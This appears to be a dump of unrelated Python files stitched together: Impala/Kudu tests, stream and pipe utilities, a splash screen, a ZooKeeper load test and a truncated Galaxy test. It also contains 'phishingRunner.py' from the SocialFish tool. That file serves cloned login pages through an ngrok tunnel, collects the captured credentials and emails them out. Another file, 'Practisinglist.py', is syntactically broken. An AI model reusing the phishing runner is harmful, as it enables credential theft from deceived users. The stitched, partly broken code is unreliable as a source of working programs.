kudu_table = kudu_client.table(kudu_table_name)
table_name_prop = "'kudu.table_name'='%s'" % kudu_table.name
self.assert_show_create_equals(cursor,
"""
CREATE EXTERNAL TABLE {{table}} STORED AS KUDU
TBLPROPERTIES({props})""".format(
props=table_name_prop),
"""
CREATE EXTERNAL TABLE {db}.{{table}}
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}', {kudu_table})""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS,
kudu_table=table_name_prop), True)
finally:
if kudu_client.table_exists(kudu_table_name):
kudu_client.delete_table(kudu_table_name)
@SkipIfKudu.hms_integration_enabled
def test_managed_kudu_table_name_with_show_create(self, cursor):
"""Check that the generated kudu.table_name tblproperty is not present with
show create table with managed Kudu tables.
"""
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
def test_synchronized_kudu_table_with_show_create(self, cursor):
# in this case we do exact match with the provided input since this is specifically
# creating a synchronized table
self.assert_show_create_equals(cursor,
"""
CREATE EXTERNAL TABLE {table} (
id BIGINT,
name STRING,
PRIMARY KEY(id))
PARTITION BY HASH PARTITIONS 16
STORED AS KUDU
TBLPROPERTIES('external.table.purge'='true')""",
"""
CREATE EXTERNAL TABLE {db}.{{table}} (
id BIGINT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
name STRING NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (id)
)
PARTITION BY HASH (id) PARTITIONS 16
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='true', 'kudu.master_addresses'='{kudu_addr}')"""
.format(db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS), True)
self.assert_show_create_equals(cursor,
"""
CREATE EXTERNAL TABLE {table} (
id BIGINT PRIMARY KEY,
name STRING)
PARTITION BY HASH(id) PARTITIONS 16
STORED AS KUDU
TBLPROPERTIES('external.table.purge'='true')""",
"""
CREATE EXTERNAL TABLE {db}.{{table}} (
id BIGINT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
name STRING NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (id)
)
PARTITION BY HASH (id) PARTITIONS 16
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='true', 'kudu.master_addresses'='{kudu_addr}')"""
.format(db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS), True)
class TestDropDb(KuduTestSuite):
@SkipIfKudu.hms_integration_enabled
def test_drop_non_empty_db(self, unique_cursor, kudu_client):
"""Check that an attempt to drop a database will fail if Kudu tables are present
and that the tables remain.
"""
db_name = unique_cursor.conn.db_name
with self.temp_kudu_table(kudu_client, [INT32], db_name=db_name) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
unique_cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
unique_cursor.execute("USE DEFAULT")
try:
unique_cursor.execute("DROP DATABASE %s" % db_name)
assert False
except Exception as e:
assert "One or more tables exist" in str(e)
unique_cursor.execute("SELECT COUNT(*) FROM %s.%s" % (db_name, impala_table_name))
assert unique_cursor.fetchall() == [(0, )]
@SkipIfKudu.hms_integration_enabled
def test_drop_db_cascade(self, unique_cursor, kudu_client):
"""Check that an attempt to drop a database will succeed even if Kudu tables are
present and that the managed tables are removed.
"""
db_name = unique_cursor.conn.db_name
with self.temp_kudu_table(kudu_client, [INT32], db_name=db_name) as kudu_table:
# Create an external Kudu table
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
unique_cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
# Create a managed Kudu table
managed_table_name = self.random_table_name()
unique_cursor.execute("""
CREATE TABLE %s (a INT PRIMARY KEY) PARTITION BY HASH (a) PARTITIONS 3
STORED AS KUDU""" % managed_table_name)
kudu_table_name = "impala::" + db_name + "." + managed_table_name
assert kudu_client.table_exists(kudu_table_name)
# Create a table in HDFS
hdfs_table_name = self.random_table_name()
unique_cursor.execute("""
CREATE TABLE %s (a INT) PARTITIONED BY (x INT)""" % (hdfs_table_name))
unique_cursor.execute("USE DEFAULT")
unique_cursor.execute("DROP DATABASE %s CASCADE" % db_name)
unique_cursor.execute("SHOW DATABASES")
assert (db_name, '') not in unique_cursor.fetchall()
assert kudu_client.table_exists(kudu_table.name)
assert not kudu_client.table_exists(managed_table_name)
class TestImpalaKuduIntegration(KuduTestSuite):
@SkipIfKudu.hms_integration_enabled
def test_replace_kudu_table(self, cursor, kudu_client):
"""Check that an external Kudu table is accessible if the underlying Kudu table is
modified using the Kudu client.
"""
# Create an external Kudu table
col_names = ['a']
with self.temp_kudu_table(kudu_client, [INT32], col_names=col_names) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
cursor.execute("DESCRIBE %s" % (impala_table_name))
assert cursor.fetchall() == \
[("a", "int", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
# Drop the underlying Kudu table and replace it with another Kudu table that has
# the same name but different schema
kudu_client.delete_table(kudu_table.name)
assert not kudu_client.table_exists(kudu_table.name)
new_col_names = ['b', 'c']
name_parts = kudu_table.name.split(".")
assert len(name_parts) == 2
with self.temp_kudu_table(kudu_client, [STRING, STRING], col_names=new_col_names,
db_name=name_parts[0], name= name_parts[1]) as new_kudu_table:
assert kudu_client.table_exists(new_kudu_table.name)
# Refresh the external table and verify that the new schema is loaded from
# Kudu.
cursor.execute("REFRESH %s" % (impala_table_name))
cursor.execute("DESCRIBE %s" % (impala_table_name))
assert cursor.fetchall() == \
[("b", "string", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0"),
("c", "string", "", "false", "true", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
@SkipIfKudu.hms_integration_enabled
def test_delete_external_kudu_table(self, cursor, kudu_client):
"""Check that Impala can recover from the case where the underlying Kudu table of
an external table is dropped using the Kudu client.
"""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
# Create an external Kudu table
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
cursor.execute("DESCRIBE %s" % (impala_table_name))
assert cursor.fetchall() == \
[("a", "int", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
# Drop the underlying Kudu table
kudu_client.delete_table(kudu_table.name)
assert not kudu_client.table_exists(kudu_table.name)
err_msg = 'the table does not exist: table_name: "%s"' % (kudu_table.name)
try:
cursor.execute("REFRESH %s" % (impala_table_name))
except Exception as e:
assert err_msg in str(e)
cursor.execute("DROP TABLE %s" % (impala_table_name))
cursor.execute("SHOW TABLES")
assert (impala_table_name,) not in cursor.fetchall()
@SkipIfKudu.hms_integration_enabled
def test_delete_managed_kudu_table(self, cursor, kudu_client, unique_database):
"""Check that dropping a managed Kudu table works even if the underlying Kudu table
has been dropped externally."""
impala_tbl_name = "foo"
cursor.execute("""CREATE TABLE %s.%s (a INT PRIMARY KEY) PARTITION BY HASH (a)
PARTITIONS 3 STORED AS KUDU""" % (unique_database, impala_tbl_name))
kudu_tbl_name = KuduTestSuite.to_kudu_table_name(unique_database, impala_tbl_name)
assert kudu_client.table_exists(kudu_tbl_name)
kudu_client.delete_table(kudu_tbl_name)
assert not kudu_client.table_exists(kudu_tbl_name)
cursor.execute("DROP TABLE %s.%s" % (unique_database, impala_tbl_name))
cursor.execute("SHOW TABLES IN %s" % unique_database)
assert (impala_tbl_name,) not in cursor.fetchall()
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
class TestKuduMemLimits(KuduTestSuite):
QUERIES = ["select * from tpch_kudu.lineitem where l_orderkey = -1",
"select * from tpch_kudu.lineitem where l_commitdate like '%cheese'",
"select * from tpch_kudu.lineitem limit 90"]
# The value indicates the minimum memory requirements for the queries above, the first
# memory limit corresponds to the first query
QUERY_MEM_LIMITS = [1, 1, 10]
@pytest.mark.execute_serially
@pytest.mark.parametrize("mem_limit", [1, 10, 0])
def test_low_mem_limit_low_selectivity_scan(self, cursor, mem_limit, vector):
"""Tests that the queries specified in this test suite run under the given
memory limits."""
exec_options = dict((k, str(v)) for k, v
in vector.get_value('exec_option').iteritems())
exec_options['mem_limit'] = "{0}m".format(mem_limit)
# IMPALA-9856: We disable query result spooling so that this test can run queries
# with low mem_limit.
exec_options['spool_query_results'] = "0"
for i, q in enumerate(self.QUERIES):
try:
cursor.execute(q, configuration=exec_options)
cursor.fetchall()
except Exception as e:
if (mem_limit > self.QUERY_MEM_LIMITS[i]):
raise
assert "Memory limit exceeded" in str(e)
# IMPALA-4654: Validate the fix for a bug where LimitReached() wasn't respected in
# the KuduScanner and the limit query above would result in a fragment running an
# additional minute. This ensures that the num fragments 'in flight' reaches 0 in
# less time than IMPALA-4654 was reproducing (~60sec) but yet still enough time that
# this test won't be flaky.
verifiers = [MetricVerifier(i.service)
for i in ImpalaCluster.get_e2e_test_cluster().impalads]
for v in verifiers:
v.wait_for_metric("impala-server.num-fragments-in-flight", 0, timeout=30)
@SkipIfHive2.create_external_kudu_table
class TestCreateSynchronizedTable(KuduTestSuite):
def test_create_synchronized_table(self, cursor, kudu_client, unique_database):
"""
Creates a synchronized Kudu table and makes sure that the statement does not fail.
"""
table_name = self.random_table_name()
# create a external kudu table with external.table.purge=true
cursor.execute("""
CREATE EXTERNAL TABLE %s.%s (
id int PRIMARY KEY,
name string)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='true')
""" % (unique_database, table_name))
# make sure that the table was created
cursor.execute("SHOW TABLES IN %s" % unique_database)
assert (table_name,) in cursor.fetchall()
# make sure that the kudu table was created with default name
assert kudu_client.table_exists(self.to_kudu_table_name(unique_database, table_name))
# make sure that the external.table.purge property can be changed
cursor.execute("ALTER TABLE %s.%s set TBLPROPERTIES ("
"'external.table.purge'='FALSE')" % (unique_database, table_name))
cursor.execute("SHOW TABLES IN %s" % unique_database)
assert (table_name,) in cursor.fetchall()
cursor.execute("ALTER TABLE %s.%s set TBLPROPERTIES ("
"'external.table.purge'='TRUE')" % (unique_database, table_name))
cursor.execute("SHOW TABLES IN %s" % unique_database)
assert (table_name,) in cursor.fetchall()
# make sure that table can be renamed
new_table_name = self.random_table_name()
cursor.execute("ALTER TABLE %s.%s rename to %s.%s" %
(unique_database, table_name, unique_database, new_table_name))
cursor.execute("SHOW TABLES IN %s" % unique_database)
assert (new_table_name,) in cursor.fetchall()
# make sure that the kudu table was created with default name
assert kudu_client.table_exists(
self.to_kudu_table_name(unique_database, new_table_name))
# now make sure that table disappears after we remove it
cursor.execute("DROP TABLE %s.%s" % (unique_database, new_table_name))
cursor.execute("SHOW TABLES IN %s" % unique_database)
assert (new_table_name,) not in cursor.fetchall()
assert not kudu_client.table_exists(
self.to_kudu_table_name(unique_database, new_table_name))
def test_invalid_sync_table_stmts(self, cursor, kudu_client, unique_database):
"""
Test makes sure that a invalid way to create a synchronized table is erroring out
"""
table_name = self.random_table_name()
try:
cursor.execute("""
CREATE EXTERNAL TABLE %s.%s (
a int PRIMARY KEY)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='false')
""" % (unique_database, table_name))
assert False,\
"Create table statement with external.table.purge=False should error out"
except Exception as e:
# We throw this exception since the analyzer checks for properties one by one.
# This is the first property that it checks for an external table
assert "Table property kudu.table_name must be specified when " \
"creating an external Kudu table" in str(e)
try:
# missing external.table.purge in TBLPROPERTIES
cursor.execute("""
CREATE EXTERNAL TABLE %s.%s (
a int PRIMARY KEY)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES ('FOO'='BAR')
""" % (unique_database, table_name))
assert False, \
"Create external table statement must include external.table.purge property"
except Exception as e:
# We throw this exception since the analyzer checks for properties one by one.
# This is the first property that it checks for an external table
assert "Table property kudu.table_name must be specified when " \
"creating an external Kudu table" in str(e)
try:
# Trying to create a managed table with external.purge.table property in it
cursor.execute("""
CREATE TABLE %s.%s (
a int PRIMARY KEY)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='true')
""" % (unique_database, table_name))
assert False, \
"Managed table creation with external.table.purge property must be disallowed"
except Exception as e:
assert "Table property 'external.table.purge' cannot be set to true " \
"with an managed Kudu table." in str(e)
# TODO should we block this?
cursor.execute("""
CREATE TABLE %s.%s (
a int PRIMARY KEY)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='False')""" % (unique_database, table_name))
cursor.execute("SHOW TABLES IN %s" % unique_database)
assert (table_name,) in cursor.fetchall()
def test_sync_tbl_with_kudu_table(self, cursor, kudu_client, unique_database):
"""
Test tries to create a synchronized table with an existing Kudu table name and
makes sure it fails.
"""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
table_name = self.random_table_name()
try:
cursor.execute("""
CREATE EXTERNAL TABLE %s.%s (
a int PRIMARY KEY)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES('external.table.purge'='true', 'kudu.table_name' = '%s')"""
% (unique_database, table_name,
self.get_kudu_table_base_name(kudu_table.name)))
assert False, "External tables with external.purge.table property must fail " \
"if the kudu table already exists"
except Exception as e:
assert "Not allowed to set 'kudu.table_name' manually for" \
" synchronized Kudu tables" in str(e)
class TestKuduReadTokenSplit(KuduTestSuite):
"""
This suite verifies impala's integration of Kudu's split token API.
"""
@classmethod
def add_test_dimensions(cls):
super(TestKuduReadTokenSplit, cls).add_test_dimensions()
# The default read mode of READ_LATEST does not provide high enough consistency for
# these tests.
add_exec_option_dimension(cls, "kudu_read_mode", "READ_AT_SNAPSHOT")
@SkipIfKudu.no_hybrid_clock
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
def test_kudu_scanner(self, vector, unique_database):
"""This runs explain query with variations of mt_dop and
targeted_kudu_scan_range_length to verify targeted_kudu_scan_range_length's
functionality.
Test disabled for EC since the erasure coded files when loaded in kudu
during data load cause the expected behaviour to change"""
explain_query = "explain select * from tpch_kudu.lineitem "
plans = []
regular_num_inst = self.__get_num_scanner_instances(explain_query, mt_dop=None,
targeted_kudu_scan_range_length=None, plans=plans)
mt_dop_1_num_inst = self.__get_num_scanner_instances(explain_query, mt_dop=1,
targeted_kudu_scan_range_length=None, plans=plans)
# targeted_kudu_scan_range_length should be disabled by default and num instances
# will be equal to the number of partitions
with_mt_dop_num_inst = self.__get_num_scanner_instances(explain_query, mt_dop=10,
targeted_kudu_scan_range_length=None, plans=plans)
# This will result is more splits
with_mt_dop_and_low_range_len_num_inst = self.__get_num_scanner_instances(
explain_query, mt_dop=10, targeted_kudu_scan_range_length="8mb", plans=plans)
assert mt_dop_1_num_inst == regular_num_inst, str(plans)
assert regular_num_inst < with_mt_dop_num_inst, str(plans)
assert with_mt_dop_num_inst < with_mt_dop_and_low_range_len_num_inst, str(plans)
def __get_num_scanner_instances(self, explain_query, mt_dop,
targeted_kudu_scan_range_length, plans):
"""This is a helper method that runs the explain query with the provided query
options (mt_dop and targeted_kudu_scan_range_length). Appends the generated plan to
'plans' and returns the num of kudu scanner instances """
regex = r'F00:PLAN FRAGMENT \[RANDOM\] hosts=3 instances=([0-9]+)'
self.client.set_configuration_option("explain_level", 3)
if targeted_kudu_scan_range_length:
self.client.set_configuration_option("targeted_kudu_scan_range_length",
targeted_kudu_scan_range_length)
if mt_dop:
self.client.set_configuration_option("mt_dop", mt_dop)
result = self.client.execute(explain_query)
plan = "\n".join(result.data)
plans.append(plan)
matches = re.search(regex, plan)
assert len(matches.groups()) == 1, plan
self.client.clear_configuration()
return int(matches.group(1))
|
stream.py | import queue
import sys
import threading
import time
_global_streams = {"stdout": None, "stderr": None}
DEBOUNCE_SECONDS = 3
class StreamBase(object):
def __init__(self, src, callbacks=None):
assert hasattr(sys, src)
self.src = src
self.callbacks = callbacks or []
@property
def src_stream(self):
return getattr(sys, "__%s__" % self.src)
@property
def src_fd(self):
return self.src_stream.fileno()
@property
def original_stream(self):
return getattr(sys, self.src)
def install(self):
curr_redirect = _global_streams.get(self.src)
if curr_redirect and curr_redirect != self:
curr_redirect.uninstall()
_global_streams[self.src] = self
def uninstall(self):
if _global_streams[self.src] != self:
return
_global_streams[self.src] = None
class StreamWrapper(StreamBase):
"""
Patches the write method of current sys.stdout/sys.stderr
"""
def __init__(self, src, callbacks=()):
super(StreamWrapper, self).__init__(src=src, callbacks=callbacks)
self._installed = False
self._queue = None
self._stopped = None
self._old_write = None
def _read_queue(self):
data = []
# TODO: Need lock?
while not self._queue.empty():
data.append(self._queue.get())
return data
def _flush(self, _data=None):
data = self._read_queue()
if _data:
data.extend(_data)
for cb in self.callbacks:
try:
cb(data)
except Exception:
# TODO: reraise?
pass
def _thread_body(self):
while not (self._stopped.is_set() and self._queue.empty()):
self._flush()
time.sleep(DEBOUNCE_SECONDS)
def install(self):
super(StreamWrapper, self).install()
if self._installed:
return
stream = self.original_stream
self._old_write = stream.write
def write(data):
self._old_write(data)
self._queue.put(data)
stream.write = write
self._queue = queue.Queue()
self._stopped = threading.Event()
# # TODO: check experiment initiated? settings online?
self._thread = threading.Thread(target=self._thread_body)
self._thread.name = "ConsoleStreamThread"
self._thread.daemon = True
self._thread.start()
self._installed = True
def uninstall(self):
if not self._installed:
return
self.original_stream.write = self._old_write
self._stopped.set()
# if self._thread.is_alive():
# self._thread.join()
self._flush()
self._installed = False
super(StreamWrapper, self).uninstall()
if __name__ == "__main__":
f = open("test_log.txt", "wb")
try:
write = lambda data: f.write("".join(data).encode("utf-8"))
s = StreamWrapper("stdout", [write])
s.install()
for i in range(100):
print(i)
if i % 10 == 0:
s._flush()
finally:
f.close()
|
splash.py | import os
import tkinter
import time
import threading
import builtins
import sys
from PIL import ImageTk, Image
sys._stderr = sys.stderr
sys._stdout = sys.stdout
def disable_print():
sys.stdout = os.devnull
sys.stderr = os.devnull
def enable_print():
sys.stdout = sys._stdout
sys.stderr = sys._stderr
def splash():
root = tkinter.Tk()
root.overrideredirect(1)
root.attributes("-topmost", True)
screen_width = root.winfo_screenwidth()
screen_height = root.winfo_screenheight()
size = int(screen_height // 2)
x = int((screen_width / 2) - (size / 2))
y = int((screen_height / 2) - (size / 2))
root.geometry(str(size) + "x" + str(size) + "+" + str(x) + "+" + str(y))
canvas = tkinter.Canvas(root, width=size, height=size,
bd=0, highlightthickness=0, relief='ridge')
canvas.pack()
splash_img = os.path.join(os.path.dirname(os.path.abspath(__file__)), "icons", "splash.png")
img = ImageTk.PhotoImage(Image.open(splash_img).resize((size, size)))
canvas.create_image(0, 0, anchor=tkinter.NW, image=img)
while True:
if os.getenv("PYUNITY_EDITOR_LOADED") == "1":
break
root.update()
time.sleep(0.2)
root.destroy()
def start(func, args=[], kwargs={}):
t = threading.Thread(target=splash)
t.daemon = True
t.start()
func(*args, **kwargs)
|
Practisinglist.py | counter = 15
lickT= 900000
start = 67
startmoment = 89
lickLst = []
rewLst= []
rewT=689
lickLst.append([counter,lickT-start,lickT-startmoment,'' +str('RL'), ''+str ('Correct')])
#print lickLst
#lickLst.append([counter,lickT-start,lickT-startmoment,'' +str('LL'), ''+str ('Incorrect')])
rewLst.append([counter, rewT-start, rewT-startmoment,'' +str('RR')])
#New data_sender function:
def data_sender (lickLst,rewLst): #Modify here since I have more than two entries in each string
lickStr = 'LickList:' + '-'.join([str(np.round(entry[0],decimals=3))+([str(np.round(entry[1],decimals=3))+([str(np.round(entry[2],decimals=3))+([str(np.round(entry[3],decimals=3))+([str(np.round(entry[4],decimals=3)) for entry in lickLst])
rewStr = 'rewList:' + '-'.join([str(np.round(entry[0],decimals=3))+([str(np.round(entry[1],decimals=3))+([str(np.round(entry[2],decimals=3))+([str(np.round(entry[3],decimals=3))for entry in rewLst])
#locStr = 'Location:' + '-'.join([str(np.round(entry[0],decimals=3)) for entry in location])
#orStr= 'Orientation:' + '-'.join([str(np.round(entry[0],decimals=3)) for entry in orientation])
sendStr = ','.join([lickStr,rewStr])
return sendStr
data_sender(lickLst,rewLst)
print sendStr
## sendProc = billiard.Process(target=send_data,args=(sendStr,))
## sendProc.start()
## print 'seeeeeending', (time.time()-start-soundT)
## #send_data(sendStr)
## sendT = time.time()
## lickLst = []; rewLst = []; #No need to empty / update the location/orientation values
## #these will be updated at the start of each trial
## return lickLst,rewLst,sendT
##
##
##
## if (time.time()-sendT> 5): #Basically, if 5 seconds have elapsed since the last data_send, then call on that function
## #and update the contents of the strings
## lickLst,rewLst,orientation,location = data_sender(lickLst,rewLst,orientation,location,sendT)
##
# Data sending function
pi_IP = [(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
pi_ID = str(int(pi_IP[-3:])-100)
def send_data(load):
headers = {'User-Agent': 'Mozilla/5.0'}
link = 'http://192.168.0.99:8000/getData/' + pi_ID + '/get_PiData/'
session = req.Session()
r1 = session.get(link,headers=headers)
link1 = 'http://192.168.0.99:8000/getData/' + pi_ID + '/write_PiData/'
payload = {'piData':load,'csrfmiddlewaretoken':r1.cookies['csrftoken']}
#cookies = dict(session.cookies)
session.post(link1,headers=headers,data=payload)
return None
def data_sender (lickLst,rewLst,orientation, location, sendT): #Modify here since I have more than two entries in each string
lickStr = 'LickList:' + '-'.join([str(np.round(entry[0],decimals=3))+ ' ' + str(np.round(entry[1],decimals=3))+ ' ' + str(np.round(entry[2],decimals=3))+ ' ' + entry[3] + ' ' + entry[4] for entry in lickLst])
rewStr = 'rewList:' + '-'.join([str(np.round(entry[0],decimals=3))+ ' ' + str(np.round(entry[1],decimals=3))+ ' ' + str(np.round(entry[2],decimals=3))+ ' ' + entry[3] for entry in rewLst])
locStr = 'Location:' + '-'.join([str(np.round(location,decimals=3))])
orStr= 'Orientation:' + '-'.join([str(np.round(orientation,decimals=3))])
sendStr = ', '.join([rewStr,lickStr,locStr,orStr])
sendProc = billiard.Process(target=send_data,args=(sendStr,))
sendProc.start()
print 'seeeeeending', (time.time()-start-soundT)
#send_data(sendStr)
sendT = time.time()
lickLst = []; rewLst = []; #No need to empty / update the location/orientation values
#these will be updated at the start of each trial
return lickLst,rewLst,sendT
|
PipeW.py | import os
import time
import io
import threading
import queue
from threading import Thread, Lock
class PipeW:
def __init__(self, fifoPath, msgQMax):
self.path = fifoPath
self.pipe = None
self.blocking = False
self.msgQ = queue.Queue()
self.msgQMax = msgQMax
self.pipeThread = Thread(target = self.PipeThreadHandler)
def OpenPipe(self):
try:
os.mkfifo(self.path)
print("Created pipe on filesystem: " . self.path)
except Exception as e:
print("MKFIFO: " + repr(e))
try:
print("Waiting for listener.")
self.blocking = True
fd = os.open(self.path, os.O_WRONLY)# blocking
self.blocking = False
print("OPENED File")
out = os.fdopen(fd, 'w') #also non-blocking
print("OPENED File descriptor")
print(io.DEFAULT_BUFFER_SIZE)
except Exception as e:
out = None
print("OPEN: " . e)
return out
def ClosePipe(self):
try:
if self.blocking == False:
self.pipe.flush()
self.pipe.close()
else:
self.pipeThreadRunning = False
except BrokenPipeError:
print("Pipe was already closed.")
self.pipe = None
try:
os.unlink(self.path)
except FileNotFoundError:
pass
def PipeThreadHandler(self):
self.pipeThreadRunning = True
self.pipe = self.OpenPipe()
while self.pipeThreadRunning:
try:
msg = self.msgQ.get(block = True, timeout = 2)
self.msgQ.task_done()
self.pipe.write(msg)
self.pipe.flush()
except queue.Empty:
pass
except BrokenPipeError:
print("Disconnected!")
self.ClosePipe()
self.pipe = self.OpenPipe()
self.ClosePipe()
def Send(self, message):
if self.msgQ.qsize() < self.msgQMax:
self.msgQ.put(message)
else:
self.msgQ.get(block = False)
self.msgQ.task_done()
self.msgQ.put(message)
def Start(self):
if self.pipeThread.is_alive() == False:
print("Starting pipe thread.")
self.pipeThread.start()
def Stop(self):
if self.pipeThread.is_alive() == True:
self.pipeThreadRunning = False
if self.blocking == True:
fifo = os.open(self.path, os.O_RDONLY)
os.close(fifo)
else:
self.ClosePipe() |
kazoo_more_room_test.py | import datetime
import random
import threading
import time
from kazoo.client import KazooClient
from zk.zk_wrapper import zkWatch
"""
自己笔记本
700 房间 400人 500count/s
50 房间 400人 220count/s
ecs 8核16G
cpu 60% 1200count /1s 5个进程 每个进程400-600 线程
cpu 15% 500count /1s 1个进程 每个进程400-600 线程
"""
zk = KazooClient(hosts='127.0.0.1:2181')
ROOT = "/1"
zk.start()
index = 0
room_list = list(range(100, 150))
room_list = [str(x) for x in room_list]
def random_room():
# return "11111"
return random.choice(room_list)
old_date = datetime.datetime.now()
def test_call(_data):
rlock.zk_acquire()
global count
global old_date
count = count + 1
if count % 200 == 0:
print(count)
now_date = datetime.datetime.now()
print((datetime.datetime.now() - old_date).total_seconds())
old_date = now_date
for i in range(200):
t = threading.Thread(target=run, args=())
t.start()
rlock.zk_release()
def run():
# for x in range(1):
zkWatch(zk, "/".join([ROOT, random_room()]), test_call, "")
count = 0
rlock = threading.RLock()
for i in range(600):
t = threading.Thread(target=run, args=())
t.start()
while True:
time.sleep(1)
|
phishingRunner.py | ######################################################
# #
# SOCIALFISH v2.0 #
# #
# by: UNDEADSEC #
# #
# Telegram Group: https://t.me/UndeadSec #
# YouTube Channel: https://youtube.com/c/UndeadSec #
# Twitter: https://twitter.com/A1S0N_ #
# #
######################################################
from contextlib import contextmanager
import json
import multiprocessing
import requests
import os
from time import sleep
from huepy import *
import subprocess
from core.email import send_mail
from core.credentials import credentials
from smtplib import SMTPSenderRefused, SMTPServerDisconnected
from time import strftime
def runPhishing(social, custom):
global _social
_social = social
os.system('rm -Rf base/Server/www/*.* && touch base/Server/www/cat.txt')
command = 'cp base/WebPages/%s/*.* base/Server/www/' % social.lower()
os.system(command)
with open('base/Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUST0M>', custom)
f = open('base/Server/www/login.php', 'w')
f.write(c)
f.close()
def waitCreds():
print(cyan(" [*] Waiting for credentials... "))
while True:
with open('base/Server/www/cat.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
print(green('\n [*] Credentials found:\n %s' % lines))
os.system('rm -rf base/Server/www/cat.txt && touch base/Server/www/cat.txt')
try:
credentials(lines.split('\n'), _social)
send_mail(lines.split('\n'),_social)
except NameError:
pass
except SMTPSenderRefused:
print(red(' [!] Sorry, sender refused :('))
pass
except SMTPServerDisconnected:
pass
@contextmanager
def runServer(port: int):
def php_process():
os.system("cd base/Server/www/ && php -n -S 127.0.0.1:%d > /dev/null 2>&1 &" % port)
php_process = multiprocessing.Process(target=php_process)
php_process.start()
yield php_process
php_process.terminate()
php_process.close()
@contextmanager
def ngrok_start(port: int):
ngrok_process = subprocess.Popen(
['./base/Server/ngrok','http','%s' % port],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
while True:
try:
ngrok_url = requests.get('http://127.0.0.1:4040/api/tunnels/command_line')
if ngrok_url.status_code == 200:
public_url = json.loads(ngrok_url.text)['public_url']
print(lightgreen('\n [*] Ngrok URL: %s' % public_url))
print(green(' [*] Your logs are being stored in: Logs/{}').format(_social + strftime('-%y%m%d.txt')))
print(yellow(' [^] Press Ctrl+C or VolDown+C(android) to quit'))
yield public_url
break
except requests.exceptions.ConnectionError:
sleep(.5)
os.kill(ngrok_process.pid, 15)
def PhishingServer(port: int=1449):
with ngrok_start(port) as ngrok:
with runServer(port) as php:
waitCreds()
|
test_runner_local.py | import os
import threading
import time
from unittest import TestCase
from galaxy import model
from galaxy.jobs import metrics
from galaxy.jobs.runners import local
from galaxy.util import bunch
from ..tools_support import (
UsesApp,
UsesTools
)
class TestLocalJobRunner(TestCase, UsesApp, UsesTools):
def setUp(self):
self.setup_app()
self._init_tool()
self.app.job_metrics = metrics.JobMetrics()
self.job_wrapper = MockJobWrapper(self.app, self.test_directory, self.tool)
def tearDown(self):
self.tear_down_app()
def test_run(self):
self.job_wrapper.command_line = "echo HelloWorld"
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "HelloWorld"
def test_galaxy_lib_on_path(self):
self.job_wrapper.command_line = '''python -c "import galaxy.util"'''
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.exit_code == 0
def test_default_slots(self):
self.job_wrapper.command_line = '''echo $GALAXY_SLOTS'''
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "1"
def test_slots_override(self):
# Set local_slots in job destination to specify slots for
# local job runner.
self.job_wrapper.job_destination.params["local_slots"] = 3
self.job_wrapper.command_line = '''echo $GALAXY_SLOTS'''
